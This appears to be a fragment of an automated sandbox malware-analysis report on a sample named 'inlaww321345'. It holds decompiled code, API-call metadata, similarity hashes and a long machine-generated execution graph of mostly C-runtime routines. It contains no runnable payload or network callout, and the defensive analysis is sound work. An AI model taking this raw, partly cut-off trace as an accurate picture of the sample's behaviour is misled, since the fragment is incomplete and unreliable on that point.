                    					_t27[_v8] =  *(_t14 + _t27);
                    					if(_t15 == 0) {
                    						_t17 = _t27;
                    					} else {
                    						_t27 = CharNextA(_t27);
                    						continue;
                    					}
                    					L5:
                    					return _t17;
                    				}
                    				_t17 = 0;
                    				goto L5;
                    			}










                    APIs
                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
                    • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060EB
                    • CharNextA.USER32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FC
                    • lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: lstrlen$CharNextlstrcmpi
                    • String ID:
                    • API String ID: 190613189-0
                    • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                    • Instruction ID: ebd02a31c913037c7252cee765efb5e80e8868db32339617edb9e16a90b2d78f
                    • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                    • Instruction Fuzzy Hash: 7CF0F631100054FFDB02DFA5CD40D9EBBA8DF46350B2640BAE841FB311D674DE11ABA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:7.8%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:9.4%
                    Total number of Nodes:1644
                    Total number of Limit Nodes:98
InitializeCriticalSectionAndSpinCount 6151->6153 6152->6151 6153->6151 6154->6143 6156 3b1670 6155->6156 6157 3b3fb5 6155->6157 6161 3b3b5c GetModuleFileNameW 6156->6161 6158 3b48b1 __malloc_crt 58 API calls 6157->6158 6160 3b3fdb _memmove 6158->6160 6159 3b3ff1 FreeEnvironmentStringsW 6159->6156 6160->6159 6162 3b3b90 _wparse_cmdline 6161->6162 6163 3b48b1 __malloc_crt 58 API calls 6162->6163 6164 3b3bd0 _wparse_cmdline 6162->6164 6163->6164 6164->6095 6166 3b3db2 __NMSG_WRITE 6165->6166 6170 3b3daa 6165->6170 6167 3b4869 __calloc_crt 58 API calls 6166->6167 6168 3b3ddb __NMSG_WRITE 6167->6168 6168->6170 6171 3b3e32 6168->6171 6172 3b4869 __calloc_crt 58 API calls 6168->6172 6173 3b3e57 6168->6173 6175 3b5457 __NMSG_WRITE 58 API calls 6168->6175 6176 3b3e6e 6168->6176 6169 3b4831 _free 58 API calls 6169->6170 6170->6099 6171->6169 6172->6168 6174 3b4831 _free 58 API calls 6173->6174 6174->6170 6175->6168 6177 3b1e99 __invoke_watson 8 API calls 6176->6177 6178 3b3e7a 6177->6178 6178->6099 6180 3b1804 __IsNonwritableInCurrentImage 6179->6180 6514 3b4942 6180->6514 6182 3b1822 __initterm_e 6184 3b1841 _doexit __IsNonwritableInCurrentImage 6182->6184 6517 3b481c 6182->6517 6184->6104 6186 3b114b _malloc 58 API calls 6185->6186 6187 3b1013 6186->6187 6583 3b11dd 6187->6583 6191 3b1088 6191->6108 6209 3b1a61 6191->6209 6192 3b104d _memset 6192->6191 6193 3b107f EnumSystemCodePagesW 6192->6193 6193->6191 6195 3b171c 6194->6195 6196 3b1721 6194->6196 6197 3b1a75 __FF_MSGBANNER 58 API calls 6195->6197 6198 3b1ad2 __NMSG_WRITE 58 API calls 6196->6198 6197->6196 6199 3b1729 6198->6199 6200 3b17a8 __mtinitlocknum 3 API calls 6199->6200 6201 3b1733 6200->6201 6201->6081 6203 3b1a75 __FF_MSGBANNER 58 API calls 6202->6203 6204 3b17c6 6203->6204 6205 3b1ad2 __NMSG_WRITE 58 API calls 6204->6205 6206 3b17ce 6205->6206 7290 3b187c 6206->7290 6210 3b1932 _doexit 58 API calls 6209->6210 6211 3b1a70 6210->6211 6211->6108 6213 3b1932 _doexit 58 API calls 6212->6213 6214 3b17f4 
6213->6214 6214->6111 6256 3b1767 6215->6256 6217 3b18a1 __init_pointers __initp_misc_winsig 6257 3b4995 EncodePointer 6217->6257 6219 3b18b9 __init_pointers 6220 3b4110 34 API calls 6219->6220 6220->6117 6222 3b456c 6221->6222 6224 3b381f 6222->6224 6258 3b40a2 6222->6258 6224->6120 6234 3b4001 6224->6234 6226 3b3895 6225->6226 6231 3b389b 6225->6231 6261 3b401f 6226->6261 6228 3b4479 DeleteCriticalSection 6264 3b4831 6228->6264 6229 3b4495 6232 3b44a1 DeleteCriticalSection 6229->6232 6233 3b3828 6229->6233 6231->6228 6231->6229 6232->6229 6233->6084 6235 3b4018 TlsAlloc 6234->6235 6236 3b3835 6234->6236 6236->6120 6236->6125 6240 3b4870 6237->6240 6239 3b384d 6239->6128 6243 3b405d 6239->6243 6240->6239 6242 3b488e 6240->6242 6290 3b74fd 6240->6290 6242->6239 6242->6240 6298 3b43a9 Sleep 6242->6298 6244 3b4073 6243->6244 6245 3b4077 TlsSetValue 6243->6245 6244->6131 6245->6131 6247 3b376e _flsall 6246->6247 6301 3b442f 6247->6301 6249 3b37ab 6308 3b3803 6249->6308 6252 3b442f __lock 58 API calls 6253 3b37cc ___addlocaleref 6252->6253 6311 3b380c 6253->6311 6255 3b37f7 _flsall 6255->6135 6256->6217 6257->6219 6259 3b40bf InitializeCriticalSectionAndSpinCount 6258->6259 6260 3b40b2 6258->6260 6259->6222 6260->6222 6262 3b4032 6261->6262 6263 3b4036 TlsFree 6261->6263 6262->6231 6263->6231 6265 3b483a HeapFree 6264->6265 6269 3b4863 __dosmaperr 6264->6269 6266 3b484f 6265->6266 6265->6269 6270 3b1cc3 6266->6270 6269->6231 6273 3b36f3 GetLastError 6270->6273 6272 3b1cc8 GetLastError 6272->6269 6287 3b403e 6273->6287 6275 3b3708 6276 3b3756 SetLastError 6275->6276 6277 3b4869 __calloc_crt 55 API calls 6275->6277 6276->6272 6278 3b371b 6277->6278 6278->6276 6279 3b405d __getptd_noexit TlsSetValue 6278->6279 6280 3b372f 6279->6280 6281 3b374d 6280->6281 6282 3b3735 6280->6282 6283 3b4831 _free 55 API calls 6281->6283 6284 3b3762 __initptd 55 API calls 6282->6284 6286 3b3753 6283->6286 6285 3b373d GetCurrentThreadId 6284->6285 6285->6276 6286->6276 6288 3b4051 6287->6288 
6289 3b4055 TlsGetValue 6287->6289 6288->6275 6289->6275 6291 3b7508 6290->6291 6294 3b7523 6290->6294 6292 3b7514 6291->6292 6291->6294 6293 3b1cc3 __setmbcp 57 API calls 6292->6293 6296 3b7519 6293->6296 6295 3b7533 HeapAlloc 6294->6295 6294->6296 6299 3b1741 DecodePointer 6294->6299 6295->6294 6295->6296 6296->6240 6298->6242 6300 3b1754 6299->6300 6300->6294 6302 3b4453 EnterCriticalSection 6301->6302 6303 3b4440 6301->6303 6302->6249 6314 3b44b7 6303->6314 6305 3b4446 6305->6302 6306 3b17be __lock 57 API calls 6305->6306 6307 3b4452 6306->6307 6307->6302 6508 3b4599 LeaveCriticalSection 6308->6508 6310 3b37c5 6310->6252 6509 3b4599 LeaveCriticalSection 6311->6509 6313 3b3813 6313->6255 6315 3b44c3 _flsall 6314->6315 6316 3b44cc 6315->6316 6317 3b44e4 6315->6317 6338 3b1a75 6316->6338 6323 3b4505 _flsall 6317->6323 6380 3b48b1 6317->6380 6323->6305 6325 3b450f 6328 3b442f __lock 58 API calls 6325->6328 6326 3b4500 6327 3b1cc3 __setmbcp 58 API calls 6326->6327 6327->6323 6330 3b4516 6328->6330 6332 3b453b 6330->6332 6333 3b4523 6330->6333 6335 3b4831 _free 58 API calls 6332->6335 6334 3b40a2 __mtinitlocks InitializeCriticalSectionAndSpinCount 6333->6334 6336 3b452f 6334->6336 6335->6336 6386 3b4557 6336->6386 6389 3b3e88 6338->6389 6340 3b1a7c 6341 3b3e88 __FF_MSGBANNER 58 API calls 6340->6341 6343 3b1a89 6340->6343 6341->6343 6342 3b1ad2 __NMSG_WRITE 58 API calls 6344 3b1aa1 6342->6344 6343->6342 6345 3b1aab 6343->6345 6346 3b1ad2 __NMSG_WRITE 58 API calls 6344->6346 6347 3b1ad2 6345->6347 6346->6345 6348 3b1af0 __NMSG_WRITE 6347->6348 6349 3b1c17 6348->6349 6350 3b3e88 __FF_MSGBANNER 55 API calls 6348->6350 6471 3b5770 6349->6471 6352 3b1b03 6350->6352 6354 3b1c1c GetStdHandle 6352->6354 6355 3b3e88 __FF_MSGBANNER 55 API calls 6352->6355 6353 3b1c80 6377 3b17a8 6353->6377 6354->6349 6358 3b1c2a _strlen 6354->6358 6356 3b1b14 6355->6356 6356->6354 6357 3b1b26 6356->6357 6357->6349 6419 3b5457 6357->6419 6358->6349 6360 3b1c63 WriteFile 6358->6360 6360->6349 
6362 3b1b53 GetModuleFileNameW 6364 3b1b73 6362->6364 6368 3b1b83 __NMSG_WRITE 6362->6368 6363 3b1c84 6365 3b1e99 __invoke_watson 8 API calls 6363->6365 6366 3b5457 __NMSG_WRITE 55 API calls 6364->6366 6367 3b1c8e 6365->6367 6366->6368 6368->6363 6369 3b1bc9 6368->6369 6428 3b54cc 6368->6428 6369->6363 6437 3b53eb 6369->6437 6373 3b53eb __NMSG_WRITE 55 API calls 6374 3b1c00 6373->6374 6374->6363 6375 3b1c07 6374->6375 6446 3b558a EncodePointer 6375->6446 6486 3b1774 GetModuleHandleExW 6377->6486 6382 3b48bf 6380->6382 6383 3b44f9 6382->6383 6384 3b48d2 6382->6384 6489 3b114b 6382->6489 6383->6325 6383->6326 6384->6382 6384->6383 6506 3b43a9 Sleep 6384->6506 6507 3b4599 LeaveCriticalSection 6386->6507 6388 3b455e 6388->6323 6390 3b3e92 6389->6390 6391 3b1cc3 __setmbcp 58 API calls 6390->6391 6392 3b3e9c 6390->6392 6393 3b3eb8 6391->6393 6392->6340 6396 3b1e89 6393->6396 6399 3b1e5e DecodePointer 6396->6399 6400 3b1e71 6399->6400 6405 3b1e99 IsProcessorFeaturePresent 6400->6405 6403 3b1e5e __wcsnicmp_l 8 API calls 6404 3b1e95 6403->6404 6404->6340 6406 3b1ea4 6405->6406 6411 3b1d2c 6406->6411 6410 3b1e88 6410->6403 6412 3b1d46 _memset __call_reportfault 6411->6412 6413 3b1d66 IsDebuggerPresent 6412->6413 6414 3b43cc __call_reportfault SetUnhandledExceptionFilter UnhandledExceptionFilter 6413->6414 6416 3b1e2a __call_reportfault 6414->6416 6415 3b5770 __cftoe_l 6 API calls 6417 3b1e4d 6415->6417 6416->6415 6418 3b43b7 GetCurrentProcess TerminateProcess 6417->6418 6418->6410 6420 3b5462 6419->6420 6422 3b5470 6419->6422 6420->6422 6425 3b5489 6420->6425 6421 3b1cc3 __setmbcp 58 API calls 6423 3b547a 6421->6423 6422->6421 6424 3b1e89 __wcsnicmp_l 9 API calls 6423->6424 6426 3b1b46 6424->6426 6425->6426 6427 3b1cc3 __setmbcp 58 API calls 6425->6427 6426->6362 6426->6363 6427->6423 6432 3b54da 6428->6432 6429 3b54de 6430 3b54e3 6429->6430 6431 3b1cc3 __setmbcp 58 API calls 6429->6431 6430->6369 6433 3b550e 6431->6433 6432->6429 6432->6430 6435 3b551d 6432->6435 6434 
3b1e89 __wcsnicmp_l 9 API calls 6433->6434 6434->6430 6435->6430 6436 3b1cc3 __setmbcp 58 API calls 6435->6436 6436->6433 6438 3b5405 6437->6438 6440 3b53f7 6437->6440 6439 3b1cc3 __setmbcp 58 API calls 6438->6439 6445 3b540f 6439->6445 6440->6438 6443 3b5431 6440->6443 6441 3b1e89 __wcsnicmp_l 9 API calls 6442 3b1be9 6441->6442 6442->6363 6442->6373 6443->6442 6444 3b1cc3 __setmbcp 58 API calls 6443->6444 6444->6445 6445->6441 6447 3b55be ___crtIsPackagedApp 6446->6447 6448 3b567d IsDebuggerPresent 6447->6448 6449 3b55cd LoadLibraryExW 6447->6449 6450 3b56a2 6448->6450 6451 3b5687 6448->6451 6452 3b560a GetProcAddress 6449->6452 6453 3b55e4 GetLastError 6449->6453 6455 3b56a7 DecodePointer 6450->6455 6459 3b5695 6450->6459 6454 3b568e OutputDebugStringW 6451->6454 6451->6459 6457 3b561e 7 API calls 6452->6457 6458 3b569a 6452->6458 6456 3b55f3 LoadLibraryExW 6453->6456 6453->6458 6454->6459 6455->6458 6456->6452 6456->6458 6460 3b567a 6457->6460 6461 3b5666 GetProcAddress EncodePointer 6457->6461 6462 3b5770 __cftoe_l 6 API calls 6458->6462 6459->6458 6465 3b56ce DecodePointer DecodePointer 6459->6465 6469 3b56e6 6459->6469 6460->6448 6461->6460 6466 3b576c 6462->6466 6463 3b571e DecodePointer 6464 3b570a DecodePointer 6463->6464 6467 3b5725 6463->6467 6464->6458 6465->6469 6466->6349 6467->6464 6470 3b5736 DecodePointer 6467->6470 6469->6463 6469->6464 6470->6464 6472 3b577a IsProcessorFeaturePresent 6471->6472 6473 3b5778 6471->6473 6475 3b7ae6 6472->6475 6473->6353 6478 3b7a95 IsDebuggerPresent 6475->6478 6479 3b7aaa __call_reportfault 6478->6479 6484 3b43cc SetUnhandledExceptionFilter UnhandledExceptionFilter 6479->6484 6481 3b7ab2 __call_reportfault 6485 3b43b7 GetCurrentProcess TerminateProcess 6481->6485 6483 3b7acf 6483->6353 6484->6481 6485->6483 6487 3b178d GetProcAddress 6486->6487 6488 3b179f ExitProcess 6486->6488 6487->6488 6490 3b11c6 6489->6490 6495 3b1157 6489->6495 6491 3b1741 __calloc_impl DecodePointer 6490->6491 6492 3b11cc 6491->6492 6496 
3b1cc3 __setmbcp 57 API calls 6492->6496 6493 3b1162 6494 3b1a75 __FF_MSGBANNER 57 API calls 6493->6494 6493->6495 6499 3b1ad2 __NMSG_WRITE 57 API calls 6493->6499 6502 3b17a8 __mtinitlocknum 3 API calls 6493->6502 6494->6493 6495->6493 6497 3b118a RtlAllocateHeap 6495->6497 6500 3b11b2 6495->6500 6503 3b1741 __calloc_impl DecodePointer 6495->6503 6504 3b11b0 6495->6504 6498 3b11be 6496->6498 6497->6495 6497->6498 6498->6382 6499->6493 6501 3b1cc3 __setmbcp 57 API calls 6500->6501 6501->6504 6502->6493 6503->6495 6505 3b1cc3 __setmbcp 57 API calls 6504->6505 6505->6498 6506->6384 6507->6388 6508->6310 6509->6313 6513 3b4599 LeaveCriticalSection 6510->6513 6512 3b3b5a 6512->6145 6513->6512 6515 3b4945 EncodePointer 6514->6515 6515->6515 6516 3b495f 6515->6516 6516->6182 6520 3b4720 6517->6520 6519 3b4827 6519->6184 6521 3b472c _flsall 6520->6521 6528 3b1920 6521->6528 6527 3b4753 _flsall 6527->6519 6529 3b442f __lock 58 API calls 6528->6529 6530 3b1927 6529->6530 6531 3b4764 DecodePointer DecodePointer 6530->6531 6532 3b4741 6531->6532 6533 3b4791 6531->6533 6542 3b475e 6532->6542 6533->6532 6545 3b7421 6533->6545 6535 3b47f4 EncodePointer EncodePointer 6535->6532 6536 3b47c8 6536->6532 6539 3b48f8 __realloc_crt 61 API calls 6536->6539 6540 3b47e2 EncodePointer 6536->6540 6537 3b47a3 6537->6535 6537->6536 6552 3b48f8 6537->6552 6541 3b47dc 6539->6541 6540->6535 6541->6532 6541->6540 6579 3b1929 6542->6579 6546 3b742a 6545->6546 6547 3b743f HeapSize 6545->6547 6548 3b1cc3 __setmbcp 58 API calls 6546->6548 6547->6537 6549 3b742f 6548->6549 6550 3b1e89 __wcsnicmp_l 9 API calls 6549->6550 6551 3b743a 6550->6551 6551->6537 6554 3b48ff 6552->6554 6555 3b493c 6554->6555 6557 3b7452 6554->6557 6578 3b43a9 Sleep 6554->6578 6555->6536 6558 3b745b 6557->6558 6559 3b7466 6557->6559 6560 3b114b _malloc 58 API calls 6558->6560 6561 3b746e 6559->6561 6570 3b747b 6559->6570 6562 3b7463 6560->6562 6563 3b4831 _free 58 API calls 6561->6563 6562->6554 6577 3b7476 __dosmaperr 
6563->6577 6564 3b74b3 6565 3b1741 __calloc_impl DecodePointer 6564->6565 6567 3b74b9 6565->6567 6566 3b7483 HeapReAlloc 6566->6570 6566->6577 6568 3b1cc3 __setmbcp 58 API calls 6567->6568 6568->6577 6569 3b74e3 6572 3b1cc3 __setmbcp 58 API calls 6569->6572 6570->6564 6570->6566 6570->6569 6571 3b1741 __calloc_impl DecodePointer 6570->6571 6574 3b74cb 6570->6574 6571->6570 6573 3b74e8 GetLastError 6572->6573 6573->6577 6575 3b1cc3 __setmbcp 58 API calls 6574->6575 6576 3b74d0 GetLastError 6575->6576 6576->6577 6577->6554 6578->6554 6582 3b4599 LeaveCriticalSection 6579->6582 6581 3b1930 6581->6527 6582->6581 6589 3b11f2 6583->6589 6585 3b1025 VirtualAlloc 6586 3b1481 6585->6586 7105 3b149c 6586->7105 6588 3b1497 6588->6192 6592 3b11fe _flsall 6589->6592 6590 3b1211 6591 3b1cc3 __setmbcp 58 API calls 6590->6591 6593 3b1216 6591->6593 6592->6590 6594 3b1242 6592->6594 6595 3b1e89 __wcsnicmp_l 9 API calls 6593->6595 6608 3b2034 6594->6608 6605 3b1221 _flsall @_EH4_CallFilterFunc@8 6595->6605 6597 3b1247 6598 3b125d 6597->6598 6599 3b1250 6597->6599 6600 3b1287 6598->6600 6601 3b1267 6598->6601 6602 3b1cc3 __setmbcp 58 API calls 6599->6602 6623 3b2153 6600->6623 6603 3b1cc3 __setmbcp 58 API calls 6601->6603 6602->6605 6603->6605 6605->6585 6609 3b2040 _flsall 6608->6609 6610 3b442f __lock 58 API calls 6609->6610 6621 3b204e 6610->6621 6611 3b20c2 6641 3b214a 6611->6641 6612 3b20c9 6614 3b48b1 __malloc_crt 58 API calls 6612->6614 6616 3b20d0 6614->6616 6615 3b213f _flsall 6615->6597 6616->6611 6618 3b40a2 __mtinitlocks InitializeCriticalSectionAndSpinCount 6616->6618 6620 3b20f6 EnterCriticalSection 6618->6620 6619 3b44b7 __mtinitlocknum 58 API calls 6619->6621 6620->6611 6621->6611 6621->6612 6621->6619 6644 3b1f9d 6621->6644 6649 3b2007 6621->6649 6624 3b2173 __wopenfile 6623->6624 6625 3b218d 6624->6625 6637 3b2348 6624->6637 6659 3b62b3 6624->6659 6626 3b1cc3 __setmbcp 58 API calls 6625->6626 6627 3b2192 6626->6627 6628 3b1e89 __wcsnicmp_l 9 API calls 6627->6628 
6630 3b1292 6628->6630 6629 3b23ab 6656 3b625f 6629->6656 6638 3b12b4 6630->6638 6634 3b62b3 __wcsnicmp 60 API calls 6635 3b2360 6634->6635 6636 3b62b3 __wcsnicmp 60 API calls 6635->6636 6635->6637 6636->6637 6637->6625 6637->6629 7098 3b1fcd 6638->7098 6640 3b12ba 6640->6605 6654 3b4599 LeaveCriticalSection 6641->6654 6643 3b2151 6643->6615 6645 3b1fa8 6644->6645 6646 3b1fbe EnterCriticalSection 6644->6646 6647 3b442f __lock 58 API calls 6645->6647 6646->6621 6648 3b1fb1 6647->6648 6648->6621 6650 3b2028 LeaveCriticalSection 6649->6650 6651 3b2015 6649->6651 6650->6621 6655 3b4599 LeaveCriticalSection 6651->6655 6653 3b2025 6653->6621 6654->6643 6655->6653 6667 3b5a43 6656->6667 6658 3b6278 6658->6630 6660 3b6351 6659->6660 6662 3b62c5 6659->6662 7010 3b6369 6660->7010 6663 3b1cc3 __setmbcp 58 API calls 6662->6663 6666 3b2341 6662->6666 6664 3b62de 6663->6664 6665 3b1e89 __wcsnicmp_l 9 API calls 6664->6665 6665->6666 6666->6634 6666->6637 6670 3b5a4f _flsall 6667->6670 6668 3b5a65 6669 3b1cc3 __setmbcp 58 API calls 6668->6669 6671 3b5a6a 6669->6671 6670->6668 6672 3b5a9b 6670->6672 6673 3b1e89 __wcsnicmp_l 9 API calls 6671->6673 6678 3b5b0c 6672->6678 6677 3b5a74 _flsall 6673->6677 6675 3b5ab7 6752 3b5ae0 6675->6752 6677->6658 6679 3b5b2c 6678->6679 6756 3b8a18 6679->6756 6681 3b1e99 __invoke_watson 8 API calls 6683 3b625e 6681->6683 6682 3b5b48 6684 3b5b82 6682->6684 6692 3b5ba5 6682->6692 6700 3b5c7f 6682->6700 6685 3b5a43 __wsopen_helper 103 API calls 6683->6685 6787 3b1c8f 6684->6787 6686 3b6278 6685->6686 6686->6675 6689 3b1cc3 __setmbcp 58 API calls 6690 3b5b94 6689->6690 6693 3b1e89 __wcsnicmp_l 9 API calls 6690->6693 6691 3b5c63 6694 3b1c8f __dosmaperr 58 API calls 6691->6694 6692->6691 6695 3b5c41 6692->6695 6720 3b5b9e 6693->6720 6696 3b5c68 6694->6696 6763 3b6d16 6695->6763 6697 3b1cc3 __setmbcp 58 API calls 6696->6697 6698 3b5c75 6697->6698 6699 3b1e89 __wcsnicmp_l 9 API calls 6698->6699 6699->6700 6700->6681 6702 3b5d0f 6703 3b5d19 6702->6703 6704 
3b5d3c 6702->6704 6705 3b1c8f __dosmaperr 58 API calls 6703->6705 6781 3b59bb 6704->6781 6707 3b5d1e 6705->6707 6708 3b1cc3 __setmbcp 58 API calls 6707->6708 6710 3b5d28 6708->6710 6709 3b5ddc GetFileType 6711 3b5e29 6709->6711 6712 3b5de7 GetLastError 6709->6712 6715 3b1cc3 __setmbcp 58 API calls 6710->6715 6795 3b6fac 6711->6795 6716 3b1ca2 __dosmaperr 58 API calls 6712->6716 6713 3b5daa GetLastError 6790 3b1ca2 6713->6790 6715->6720 6721 3b5e0e CloseHandle 6716->6721 6718 3b59bb ___createFile 3 API calls 6722 3b5d9f 6718->6722 6719 3b5dcf 6725 3b1cc3 __setmbcp 58 API calls 6719->6725 6720->6675 6721->6719 6724 3b5e1c 6721->6724 6722->6709 6722->6713 6726 3b1cc3 __setmbcp 58 API calls 6724->6726 6725->6700 6727 3b5e21 6726->6727 6727->6719 6728 3b6002 6728->6700 6731 3b61d5 CloseHandle 6728->6731 6733 3b59bb ___createFile 3 API calls 6731->6733 6735 3b61fc 6733->6735 6734 3b2a2a 70 API calls __read_nolock 6748 3b5ec8 6734->6748 6737 3b608c 6735->6737 6738 3b6204 GetLastError 6735->6738 6736 3b1c8f __dosmaperr 58 API calls 6736->6748 6737->6700 6739 3b1ca2 __dosmaperr 58 API calls 6738->6739 6741 3b6210 6739->6741 6740 3b5ed0 6740->6748 6813 3b897e 6740->6813 6828 3b86ed 6740->6828 6887 3b6ebf 6741->6887 6746 3b607f 6747 3b897e __close_nolock 61 API calls 6746->6747 6749 3b6086 6747->6749 6748->6728 6748->6734 6748->6740 6748->6746 6750 3b7054 60 API calls __lseeki64_nolock 6748->6750 6859 3b7d99 6748->6859 6751 3b1cc3 __setmbcp 58 API calls 6749->6751 6750->6748 6751->6737 6753 3b5b0a 6752->6753 6754 3b5ae6 6752->6754 6753->6677 7009 3b702e LeaveCriticalSection 6754->7009 6757 3b8a22 6756->6757 6758 3b8a37 6756->6758 6759 3b1cc3 __setmbcp 58 API calls 6757->6759 6758->6682 6760 3b8a27 6759->6760 6761 3b1e89 __wcsnicmp_l 9 API calls 6760->6761 6762 3b8a32 6761->6762 6762->6682 6764 3b6d22 _flsall 6763->6764 6765 3b44b7 __mtinitlocknum 58 API calls 6764->6765 6766 3b6d33 6765->6766 6767 3b442f __lock 58 API calls 6766->6767 6768 3b6d38 _flsall 6766->6768 6777 
3b6d46 6767->6777 6768->6702 6769 3b6e94 6908 3b6eb6 6769->6908 6771 3b6e26 6772 3b4869 __calloc_crt 58 API calls 6771->6772 6775 3b6e2f 6772->6775 6773 3b6dc6 EnterCriticalSection 6776 3b6dd6 LeaveCriticalSection 6773->6776 6773->6777 6774 3b442f __lock 58 API calls 6774->6777 6775->6769 6899 3b6c88 6775->6899 6776->6777 6777->6769 6777->6771 6777->6773 6777->6774 6779 3b40a2 __mtinitlocks InitializeCriticalSectionAndSpinCount 6777->6779 6896 3b6dee 6777->6896 6779->6777 6782 3b59c6 ___crtIsPackagedApp 6781->6782 6783 3b59ca GetModuleHandleW GetProcAddress 6782->6783 6784 3b5a21 CreateFileW 6782->6784 6786 3b59e7 6783->6786 6785 3b5a3f 6784->6785 6785->6709 6785->6713 6785->6718 6786->6785 6788 3b36f3 __getptd_noexit 58 API calls 6787->6788 6789 3b1c94 6788->6789 6789->6689 6791 3b1c8f __dosmaperr 58 API calls 6790->6791 6792 3b1cab __dosmaperr 6791->6792 6793 3b1cc3 __setmbcp 58 API calls 6792->6793 6794 3b1cbe 6793->6794 6794->6719 6796 3b6fb8 6795->6796 6797 3b7014 6795->6797 6796->6797 6803 3b6fda 6796->6803 6798 3b1cc3 __setmbcp 58 API calls 6797->6798 6799 3b7019 6798->6799 6800 3b1c8f __dosmaperr 58 API calls 6799->6800 6801 3b5e47 6800->6801 6801->6728 6801->6748 6804 3b7054 6801->6804 6802 3b6fff SetStdHandle 6802->6801 6803->6801 6803->6802 6916 3b6f45 6804->6916 6806 3b7064 6807 3b707d SetFilePointerEx 6806->6807 6808 3b706c 6806->6808 6810 3b7095 GetLastError 6807->6810 6811 3b5eb1 6807->6811 6809 3b1cc3 __setmbcp 58 API calls 6808->6809 6809->6811 6812 3b1ca2 __dosmaperr 58 API calls 6810->6812 6811->6736 6811->6748 6812->6811 6814 3b6f45 __close_nolock 58 API calls 6813->6814 6817 3b898c 6814->6817 6815 3b89e2 6816 3b6ebf __free_osfhnd 59 API calls 6815->6816 6819 3b89ea 6816->6819 6817->6815 6818 3b89c0 6817->6818 6820 3b6f45 __close_nolock 58 API calls 6817->6820 6818->6815 6821 3b6f45 __close_nolock 58 API calls 6818->6821 6822 3b8a0c 6819->6822 6825 3b1ca2 __dosmaperr 58 API calls 6819->6825 6823 3b89b7 6820->6823 6824 3b89cc CloseHandle 
6821->6824 6822->6740 6826 3b6f45 __close_nolock 58 API calls 6823->6826 6824->6815 6827 3b89d8 GetLastError 6824->6827 6825->6822 6826->6818 6827->6815 6829 3b7054 __lseeki64_nolock 60 API calls 6828->6829 6830 3b870a 6829->6830 6831 3b7054 __lseeki64_nolock 60 API calls 6830->6831 6840 3b876f 6830->6840 6835 3b8726 6831->6835 6832 3b1cc3 __setmbcp 58 API calls 6841 3b877a 6832->6841 6833 3b880e 6839 3b7054 __lseeki64_nolock 60 API calls 6833->6839 6856 3b8874 6833->6856 6834 3b874f GetProcessHeap HeapAlloc 6836 3b876a 6834->6836 6848 3b8783 __setmode_nolock 6834->6848 6835->6833 6835->6834 6835->6840 6838 3b1cc3 __setmbcp 58 API calls 6836->6838 6837 3b7054 __lseeki64_nolock 60 API calls 6837->6840 6838->6840 6842 3b8826 6839->6842 6840->6832 6840->6841 6841->6740 6842->6840 6843 3b6f45 __close_nolock 58 API calls 6842->6843 6844 3b883a SetEndOfFile 6843->6844 6845 3b885a 6844->6845 6844->6856 6847 3b1cc3 __setmbcp 58 API calls 6845->6847 6849 3b885f 6847->6849 6850 3b87d4 6848->6850 6852 3b87e3 __setmode_nolock 6848->6852 6929 3b7e88 6848->6929 6851 3b1c8f __dosmaperr 58 API calls 6849->6851 6853 3b1c8f __dosmaperr 58 API calls 6850->6853 6854 3b886a GetLastError 6851->6854 6857 3b87f8 GetProcessHeap HeapFree 6852->6857 6855 3b87d9 6853->6855 6854->6856 6855->6852 6858 3b1cc3 __setmbcp 58 API calls 6855->6858 6856->6837 6856->6840 6857->6856 6858->6852 6860 3b7da5 _flsall 6859->6860 6861 3b7dc9 6860->6861 6862 3b7db2 6860->6862 6864 3b7e68 6861->6864 6867 3b7ddd 6861->6867 6863 3b1c8f __dosmaperr 58 API calls 6862->6863 6866 3b7db7 6863->6866 6865 3b1c8f __dosmaperr 58 API calls 6864->6865 6870 3b7e00 6865->6870 6871 3b1cc3 __setmbcp 58 API calls 6866->6871 6868 3b7dfb 6867->6868 6869 3b7e05 6867->6869 6872 3b1c8f __dosmaperr 58 API calls 6868->6872 6873 3b6c88 ___lock_fhandle 59 API calls 6869->6873 6875 3b1cc3 __setmbcp 58 API calls 6870->6875 6882 3b7dbe _flsall 6871->6882 6872->6870 6874 3b7e0b 6873->6874 6876 3b7e1e 6874->6876 6877 3b7e31 6874->6877 6878 
3b7e74 6875->6878 6879 3b7e88 __write_nolock 76 API calls 6876->6879 6881 3b1cc3 __setmbcp 58 API calls 6877->6881 6880 3b1e89 __wcsnicmp_l 9 API calls 6878->6880 6883 3b7e2a 6879->6883 6880->6882 6884 3b7e36 6881->6884 6882->6748 7005 3b7e60 6883->7005 6885 3b1c8f __dosmaperr 58 API calls 6884->6885 6885->6883 6888 3b6f2b 6887->6888 6891 3b6ecb 6887->6891 6889 3b1cc3 __setmbcp 58 API calls 6888->6889 6890 3b6f30 6889->6890 6892 3b1c8f __dosmaperr 58 API calls 6890->6892 6891->6888 6895 3b6ef4 6891->6895 6893 3b6f1c 6892->6893 6893->6737 6894 3b6f16 SetStdHandle 6894->6893 6895->6893 6895->6894 6911 3b4599 LeaveCriticalSection 6896->6911 6898 3b6df5 6898->6777 6900 3b6c94 _flsall 6899->6900 6901 3b6ce3 EnterCriticalSection 6900->6901 6903 3b442f __lock 58 API calls 6900->6903 6902 3b6d09 _flsall 6901->6902 6902->6769 6904 3b6cb9 6903->6904 6905 3b6cd1 6904->6905 6906 3b40a2 __mtinitlocks InitializeCriticalSectionAndSpinCount 6904->6906 6912 3b6d0d 6905->6912 6906->6905 6915 3b4599 LeaveCriticalSection 6908->6915 6910 3b6ebd 6910->6768 6911->6898 6913 3b4599 _doexit LeaveCriticalSection 6912->6913 6914 3b6d14 